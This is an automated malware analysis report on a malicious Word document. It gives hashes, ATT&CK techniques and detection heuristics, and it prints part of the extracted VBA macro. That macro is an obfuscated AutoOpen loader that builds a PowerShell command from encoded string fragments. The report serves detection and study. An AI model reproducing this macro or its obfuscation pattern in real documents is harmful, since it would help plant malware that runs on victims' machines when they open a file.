Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f1dfd2693fc5dd65…

MALICIOUS

Office (OLE)

95.0 KB Created: 2018-07-06 07:20:00 Authoring application: Microsoft Office Word First seen: 2018-07-23
MD5: c380591108a7934007330071cb35b11a SHA-1: 6e078c7fbd399a314e965118a3db71d742f13d8d SHA-256: f1dfd2693fc5dd6581cf6695148263998833f7082e98012a3e6bad3fd02aab0a
282 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-executing VBA loader. The AutoOpen macro is present and uses CreateObject and Shell calls, which are critical findings. The script attempts to construct and execute a PowerShell command, evidenced by the string concatenation 'wersh' + 'ell ' and a second obfuscated string that likely represents arguments or a command to be executed by PowerShell.

Heuristics 8

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9709 bytes
SHA-256: d1b63dc7f6337e4d287721a439f6862c198a9a07880564d047c847d69416005f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "zEujVzCVV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   TcFwIi = qOImLr * VqFLU / Qprbi - HMvuDR + (77289 / sSUjB) / 87808 - 16661
   lVQQnV = GhoRth * aHwQVB / uLvah - YoRzZ + (35232 / GTuDV) / 33154 - 69045
   RjsPJY = PFPNP * liUTXT / TEUWdQ - WVKaI + (79258 / avlaz) / 76989 - 67235
   PnORTZ = iFHTp * NOdcG / DGisoK - ImclN + (14530 / zfEEnp) / 60080 - 57281
   TInNj = oFSsk * NVXpW / hpwJU - GtZHqA + (19651 / TklRlz) / 99056 - 36112
   awOhp = iWpjQ * LVlsV / uvoEaZ - jisZf + (22625 / GSwiCV) / 61945 - 11870
bmuaOlrwv (ZsASoAjo + wUcYPJdYwr + ffVFUHcIvOf)
   TDEFa = MzZZm * JoLHq / hPSiwj - kGDYHO + (70872 / wBYBnw) / 350 - 56796
End Sub


Attribute VB_Name = "OjdbdaqIcXEv"
Function ZsASoAjo()
On Error Resume Next
VrqiO = (26887 + AHlwz - (78266 * cMqJiO - 16082 + 23503))
   vaZnO = (73290 + SLflN - (2264 * SwnFFr - 17924 + 49467))
   mslmHc = (84636 + sTSXv - (51203 * zIkFP - 63238 + 37258))
Kpbzc = "wersh" + "ell " + "         " + "    " + "    " + Chr(40) + " '101" + "_19P24" + "~3-124i4" + "7B36" + "B54<108k" + "46k3"
XGfwT = (66649 + JObsaZ - (39370 * bjjhV - 48365 + 83859))
   tAzvTw = (17558 + MrWcjs - (60139 * cGVfFQ - 30816 + 11622))
   VihjY = (22738 + jfIsGu - (73652 * mrzMLt - 13031 + 19599))
   EMnJX = (55401 + tOOaCQ - (30340 * nfadD - 1128 + 3238))
PjvDhZYai = "5%43~36~" + "34<53<97<" + "15<36-5" + "3i111" + "-22P36i35" + "<2w45k40"
oWHPU = (26136 + iWhSI - (74214 * bIwtqn - 58817 + 20273))
   pwNXWC = (59775 + osvDUC - (65216 * WIXRst - 77080 + 84189))
   kBwtBv = (20873 + KUNIf - (47753 * ihqfA - 53500 + 26571))
cGKZWBXFdIo = "i36<47~5" + "3_122%101" + "w4B54w46%" + "124%102~" + "41i53%53" + "B49<123~" + "110k11" + "0<54"
GoicX = (42793 + ODQAQU - (74383 * jPXtFQ - 10342 + 24259))
   kvuBYW = (58409 + IfSRcd - (51829 * wzRbT - 56386 + 48929))
NvYcAlrqKqw = "P54i54k" + "111~34B" + "51i36w" + "36<37i" + "34<51k3" + "2-39i53P1" + "11k4" + "7-36" + "~53i110B4" + "6%59B1" + "6i38_25B"
GfPrA = (53441 + wsGcIh - (18596 * qbUQjw - 74284 + 70804))
   PDFWHV = (49133 + SizQkI - (73349 * YMaGc - 21573 + 37449))
   jzdXC = (9055 + NSAqKB - (33805 * ZSsCJ - 88618 + 83179))
bFJwpN = "52k120-1" + "10<1%41" + "%53B53i" + "49k123w11" + "0k110_5" + "4B54" + "i54k11" + "1k34k46-" + "40-44i3" + "5<51k" + "32k38%32B" + "51%34~40"
BqDIF = (37711 + vdTcwa - (79813 * svOIo - 62431 + 48655))
BaahvHGuJ = "~32<111%3" + "2~37%55%" + "111w35%5" + "1%110w" + "40-41P" + "56B25w5<" + "47P114-41" + "_9P36B1" + "10i1~"
fuiJT = (80114 + hIBNjE - (24952 * vOYzid - 84446 + 4864))
dCCRLC = "41k53i" + "53_4" + "9k123w11" + "0k110k54" + "-54k54_11" + "1-50B" + "52<37_3" + "6<32w44<" + "35<32w45_" + "32-43B11" + "1i34" + "<46P4"
ZsASoAjo = Kpbzc + PjvDhZYai + cGKZWBXFdIo + NvYcAlrqKqw + bFJwpN + BaahvHGuJ + dCCRLC
   BFfhn = (84755 + sVMCYY - (50318 * nGnIi - 54836 + 27257))
   cuIjbn = (88028 + ZZMlKi - (60577 * SnnLr - 2995 + 53216))
   OZONGG = (52257 + PRaiO - (32484 * jftoRd - 80363 + 87612))
End Function
Function wUcYPJdYwr()
On Error Resume Next
jZCVY = (61343 + ziVMz - (11057 * nziwXD - 21541 + 14762))
   lOTKp = (74868 + jSOdUl - (27944 * jJHzrY - 79623 + 1737))
   tqrdX = (84831 + zXbsun - (55212 * awGwUa - 28336 + 44793))
   tjlNWz = (91719 + sGGNi - (20804 * ibUDsZ - 69939 + 6438))
QWBZEw = "4B110i" + "37<4" + "4%42" + "k47%1" + "10%4" + "8w56i" + "48i45B1" + "2P116" + "w7<117%11" + "0~1B41i53" + "-53i49%12" + "3i110w1"
dELliT = (74917 + vBWSQS - (28301 * lzbVOm - 69867 + 80257))
   qEhGJd = (10672 + dIEkU - (28182 * NLiBoo - 84562 + 37647))
nBCCwCHidLn = "10<54B54" + "w54B111" + "i37w36i5" + "3i50k42~" + "40i56~3" + "6%35_46" + "B45_36" + "i59i" + "47_40w11" + "1~51B5"
CAowkO = (61843 + YuQwpR - (93333 * NIvuQ - 75298 + 99635))
CKXRjHCN = "2B110i" + "10-23-9" + "<24-50_5" + "9<41_" + "54i15P1" + "10i1B41%5" + "3i
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.